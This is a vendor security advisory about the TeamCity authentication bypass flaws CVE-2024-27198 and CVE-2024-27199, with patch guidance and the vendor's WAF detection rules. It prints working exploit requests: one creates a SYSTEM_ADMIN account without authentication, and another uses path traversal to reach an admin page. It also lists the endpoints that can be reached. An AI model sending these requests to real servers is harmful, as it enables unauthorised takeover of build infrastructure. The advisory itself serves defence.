1. Overview
TeamCity is JetBrains' build management and continuous integration server, and this article summarizes our analysis of the authentication bypass vulnerabilities, CVE-2024-27198 and CVE-2024-27199, that were recently discovered in the service.
Source : https://www.helpnetsecurity.com/2024/03/21/exploiting-cve-2024-27198/
2. Attack Type
In March 2024, JetBrains released patches for CVE-2024-27198 and CVE-2024-27199, which were discovered in TeamCity, and Rapid7 published an analysis of the vulnerabilities.
2-1. CVE-2024-27198
In JetBrains' TeamCity, an HTTP web server can be run over port 8111, which allows access to authentication-required endpoints without authentication when sending a request with a crafted URI and a specific class of request handling.
To leverage this vulnerability to gain access to an authentication-required endpoint, the following requirements must be met
-
Request a URL that does not exist on that server. In most PoCs, this appears to be accomplished by requesting a /hax URL.
-
Create the Endpoint you want to access with the ;.jsp= parameter.
-
Write the request so that the URL ends in ;.jsp.
POST /hax?jsp=/app/rest/users.jsp HTTP/1.1
Content-Length: 177
Content-Type: application/json
Host: 172.29.228.65:8111
User-Agent: HTTPie
{
"username": "haxor",
"password": "haxor",
"email": "haxor",
"roles": {
"role": [
{
"roleId": "SYSTEM_ADMIN",
"scope": "g"
}
]
}
}
2-2. CVE-2024-27199
In JetBrains' TeamCity HTTP web server, there are some endpoints that do not require authentication, and it is possible to leverage the path traversal syntax, ../, to access endpoints that do require authentication to modify system settings or access sensitive information.
The following endpoints are exploitable because they do not require authentication.
/res//update//.well-known/acme-challenge/
Endpoints that are commonly attacked by utilizing the ../ syntax with these endpoints include
/app/availableRunners/app/https/settings/setPort/app/https/settings/certificateInfo/app/https/settings/defaultHttpsPort/app/https/settings/fetchFromAcme/app/https/settings/removeCertificate/app/https/settings/uploadCertificate/app/https/settings/termsOfService/app/https/settings/triggerAcmeChallenge/app/https/settings/cancelAcmeChallenge/app/https/settings/getAcmeOrder/app/https/settings/setRedirectStrategy/app/pipeline/app/oauth/space/createBuild.html
Example attack syntax :
GET /res/../admin/diagnostic.jsp HTTP/1.1
Host: 172.29.228.65:8111
User-Agent: HTTPie
3. Countermeasures
JetBrains has now released patches for these vulnerabilities, so you can respond by updating your TeamCity On-Premises server to version 2023.11.4 or later.
In our AIWAF product, CVE-2024-27198 can be detected with the "2186: TeamCity Authentication Bypass" pattern included in the March 2024 pattern update, and CVE-2024-27199 is being detected normally with the "Directory Access Detection" policy.
4. Conclusion
These vulnerabilities found in JetBrains TeamCity, a CI/CD product utilized by many organizations, are easily exploitable and should be updated to the latest version as soon as possible.
Our AIWAF product has developed patterns to respond to vulnerabilities in JetBrains TeamCity and other products, and we will continue to respond quickly to related vulnerabilities as they are discovered.
